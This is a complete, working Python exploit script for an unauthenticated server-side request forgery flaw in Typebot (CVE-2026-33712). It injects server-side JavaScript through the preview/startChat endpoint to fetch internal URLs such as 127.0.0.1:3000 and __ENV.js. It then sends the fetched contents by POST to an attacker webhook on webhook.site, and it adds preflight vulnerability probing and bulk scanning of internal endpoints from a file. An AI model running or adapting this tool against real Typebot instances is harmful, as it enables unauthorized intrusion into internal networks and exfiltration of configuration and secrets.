#!/usr/bin/env python3 """ CVE-2026-33712 - Typebot Unauthenticated SSRF Exploit Typebot <= 3.15.2 - Unauthenticated SSRF via isolated-vm sandbox fetch that bypasses validateHttpReqUrl() SSRF protection. The fetch() inside the isolated-vm sandbox returns response.text() directly, so the result is a string, not a Response object. Do NOT call .text() on it. """ import requests import json import sys import urllib.parse import argparse import time import random import string import os import re ENDPOINTS_FILE = os.path.join(os.path.dirname(os.path.abspath(__file__)), "endpoints.txt") def rand_id(length=6): return "".join(random.choices(string.ascii_lowercase + string.digits, k=length)) def js_escape(s): return s.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n") def build_payload(code): rid = rand_id() return { "typebotId": f"sr-{rid}", "typebot": { "version": "6", "id": f"bt-{rid}", "workspaceId": "test", "updatedAt": "2026-01-01T00:00:00.000Z", "groups": [ { "id": f"g1-{rid}", "title": "Start", "graphCoordinates": {"x": 0, "y": 0}, "blocks": [ {"id": f"b1-{rid}", "type": "start", "label": "Start", "outgoingEdgeId": f"e1-{rid}"} ], }, { "id": f"g2-{rid}", "title": "Run", "graphCoordinates": {"x": 200, "y": 0}, "blocks": [ { "id": f"b2-{rid}", "type": "Code", "outgoingEdgeId": f"e2-{rid}", "options": { "name": "SSRF", "content": code, "isExecutedOnClient": False, "isUnsafe": True, }, } ], }, ], "edges": [ {"id": f"e1-{rid}", "from": {"blockId": f"b1-{rid}"}, "to": {"groupId": f"g2-{rid}"}} ], "events": [ {"id": f"ev1-{rid}", "type": "start", "outgoingEdgeId": f"e1-{rid}", "graphCoordinates": {"x": 0, "y": 0}} ], "variables": [{"id": f"v1-{rid}", "name": "r"}], "settings": {"general": {}}, "theme": {"general": {}, "chat": {}}, }, } def send_ssrf(base_url, code, timeout=20): payload = build_payload(code) endpoint = f"{base_url.rstrip('/')}/api/v1/typebots/{payload['typebotId']}/preview/startChat" headers = {"Content-Type": "application/json", "Accept": "application/json"} try: r = requests.post(endpoint, json=payload, headers=headers, timeout=timeout) return r.json() except requests.exceptions.RequestException as e: return {"error": str(e)} def preflight_check(base_url, webhook=None, timeout=15): """Probe the target to determine if it's vulnerable, patched, or unreachable. Returns one of: 'vulnerable', 'patched', 'endpoint_missing', 'error'.""" wh_callback = "" if webhook: wh_callback = f""" await fetch("{webhook}", {{ method: "POST", headers: {{"Content-Type": "text/plain"}}, body: "preflight-ok: " + (typeof r === "string" ? r.substring(0,100) : (await r.text()).substring(0,100)) }}); """ code = f""" try {{ var r = await fetch("http://127.0.0.1:3000/");{wh_callback} }} catch(e) {{}} var x = 1; """ resp = send_ssrf(base_url, code, timeout) if "sessionId" in resp: return "vulnerable" msg = resp.get("message", "") or json.dumps(resp) if "UNAUTHORIZED" in msg or "You must be logged in" in msg: return "patched" if "NOT_FOUND" in msg or "Not found" in msg: return "endpoint_missing" if "error" in resp: return f"error: {resp['error'][:80]}" return f"unexpected: {json.dumps(resp)[:100]}" def exfiltrate(base_url, internal_url, webhook, label="", timeout=20): """Fetch an internal URL and exfiltrate its content via POST body to webhook.""" safe = js_escape(internal_url) l_escaped = urllib.parse.quote(label or internal_url, safe="") code = f""" try {{ var r = await fetch("{safe}"); var b = typeof r === "string" ? r : await r.text(); await fetch("{webhook}", {{ method: "POST", headers: {{"Content-Type": "text/plain"}}, body: "{l_escaped}: " + b }}); }} catch(e) {{ await fetch("{webhook}?err_{l_escaped}=" + encodeURIComponent(e.toString().substring(0,200))); }} """ return send_ssrf(base_url, code, timeout) def ensure_scheme(url): if url and not url.startswith("http://") and not url.startswith("https://"): return f"http://{url}" return url def detect_viewer_url(target, timeout=15): """Probe /__ENV.js on target to find NEXT_PUBLIC_VIEWER_URL.""" url = ensure_scheme(target).rstrip("/") + "/__ENV.js" try: r = requests.get(url, timeout=timeout) if r.status_code == 200: m = re.search(r'NEXT_PUBLIC_VIEWER_URL["\']?:\s*["\']([^"\']+)["\']', r.text) if m: viewer = m.group(1) print(f"[+] Detected viewer URL from __ENV.js: {viewer}") return viewer except requests.exceptions.RequestException: pass return None def load_endpoints(): """Load endpoint URLs from endpoints.txt (one URL per line, ignores blanks).""" if not os.path.exists(ENDPOINTS_FILE): print(f"[-] Endpoints file not found: {ENDPOINTS_FILE}", file=sys.stderr) return [] targets = [] with open(ENDPOINTS_FILE) as f: for line in f: line = line.strip() if not line: continue targets.append((ensure_scheme(line), line)) return targets def scan_targets(base_url, targets, webhook, delay=0.3): """Scan multiple internal URLs and exfiltrate results.""" for i, (url, desc) in enumerate(targets): label = f"[{i+1}/{len(targets)}] {desc}" print(f" {label:50s} {url}", end=" ", flush=True) resp = exfiltrate(base_url, url, webhook, label) if "sessionId" in resp: print("OK") elif "error" in resp: print(f"FAIL: {resp['error'][:60]}") else: s = json.dumps(resp) print(f"UNEXPECTED: {s[:80]}") time.sleep(delay) def main(): parser = argparse.ArgumentParser( description="CVE-2026-33712 - Typebot Unauthenticated SSRF Exploit", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: # Single URL %(prog)s -t https://bot.example.com -u http://127.0.0.1:3000/__ENV.js -w https://webhook.site/your-uuid # Scan all endpoints from endpoints.txt %(prog)s -t https://bot.example.com -w https://webhook.site/your-uuid --scan # Auto-detect viewer URL from builder's __ENV.js %(prog)s -t https://builder.example.com -w https://webhook.site/your-uuid --detect-viewer --scan # Single test with output to endpoint %(prog)s -t https://bot.example.com -u http://typebot-builder:3000/ -w https://webhook.site/your-uuid """, ) parser.add_argument("-t", "--target", required=True, help="Vulnerable Typebot instance URL (e.g. https://bot.example.com)") parser.add_argument("-u", "--url", help="Internal URL to fetch via SSRF") parser.add_argument("-w", "--webhook", default=os.environ.get("WEBHOOK_URL"), help="Webhook URL for data exfiltration (or set WEBHOOK_URL env var)") parser.add_argument("--scan", action="store_true", help="Scan all URLs from endpoints.txt") parser.add_argument("--detect-viewer", action="store_true", help="Auto-detect viewer URL from builder's __ENV.js and use it as target") parser.add_argument("--force", action="store_true", help="Skip pre-flight checks and force execution") parser.add_argument("--timeout", type=int, default=20, help="Request timeout in seconds (default: 20)") parser.add_argument("--delay", type=float, default=0.3, help="Delay between scan requests (default: 0.3)") args = parser.parse_args() args.target = ensure_scheme(args.target) # Auto-detect viewer URL from builder if args.detect_viewer: print(f"[*] Probing: {args.target}") viewer = detect_viewer_url(args.target, args.timeout) if viewer: args.target = ensure_scheme(viewer) else: print("[-] Could not detect viewer URL, using target as-is") print(f"[*] Target: {args.target}") if not args.webhook: print("[-] Error: --webhook / -w is required (or set WEBHOOK_URL env var)") print(" Get one at https://webhook.site") sys.exit(1) print(f" Webhook: {args.webhook}") print() # Pre-flight check print("[*] Pre-flight: probing target...", end=" ", flush=True) status = preflight_check(args.target, args.webhook, args.timeout) print(status) if status == "patched": print("[-] Target is patched (auth required). SSRF not exploitable.") if not args.force: sys.exit(1) elif status == "endpoint_missing": print("[-] Endpoint not found. Target may be the builder (not viewer), wrong version, or wrong URL.") print(" Try --detect-viewer if this might be the builder.") if not args.force: sys.exit(1) elif status == "vulnerable": print("[+] Target appears VULNERABLE! Proceeding...") elif status.startswith("error"): print(f"[-] {status}") if not args.force: sys.exit(1) else: print(f"[-] {status}") if not args.force: sys.exit(1) print() # Scan mode if args.scan: targets = load_endpoints() if not targets: print("[-] No endpoints found. Make sure endpoints.txt exists with valid URLs.") sys.exit(1) print(f"[*] Scanning {len(targets)} endpoints from endpoints.txt...\n") scan_targets(args.target, targets, args.webhook, args.delay) print(f"\n[*] Done. Check your webhook ({args.webhook}) for results.") return # Single URL mode if not args.url: print("[-] Error: --url / -u is required, or use --scan to read from endpoints.txt") sys.exit(1) args.url = ensure_scheme(args.url) print(f"[*] Fetching: {args.url}") resp = exfiltrate(args.target, args.url, args.webhook) if "sessionId" in resp: print("[+] Request sent. Check webhook for response body.") else: print(f"[-] Failed: {json.dumps(resp)[:200]}") if __name__ == "__main__": main()